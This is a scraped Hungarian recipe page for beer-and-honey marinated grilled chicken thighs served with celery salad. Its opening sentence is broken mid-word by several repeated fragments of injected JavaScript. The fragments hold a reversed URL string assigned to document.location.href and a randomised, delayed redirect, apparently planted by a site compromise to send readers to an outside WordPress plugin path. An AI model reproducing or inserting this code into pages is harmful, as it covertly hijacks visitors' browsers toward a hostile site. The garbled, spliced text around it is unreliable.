Elkészítés: a megtisztítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott csirkecombot helyezze a grillezés előtt egy nappal az olívaolajból, barna sörből, rozmaringból és mézből készült pácba. Keverje jól össze, majd tegye a hűtőbe. Az ételhez zellersalátát ajánlunk. Reszelje le a zellergumót, és ízesítse majonézzel, sóval és borssal. A csirkecombot alumínium grilltálcán süsse, a szaft megmaradjon! Sütés közben locsolja a szafttal, és grillezze mindkét oldalát öt-öt percig. Hozzávalók: 1/2 db zellergumó1 kg csirkecomb0.5 l barna sörméz majonéz sóbors1 szál rozmaringolívaolaj (Forrás:iranyakonyha.hu, tesco.hu / Fotó: pinterest)
A cikk folytatódik: http://iranyakonyha.co.hu/cikk/id/pacolt_csirkecomb_100118
- Hirdetés -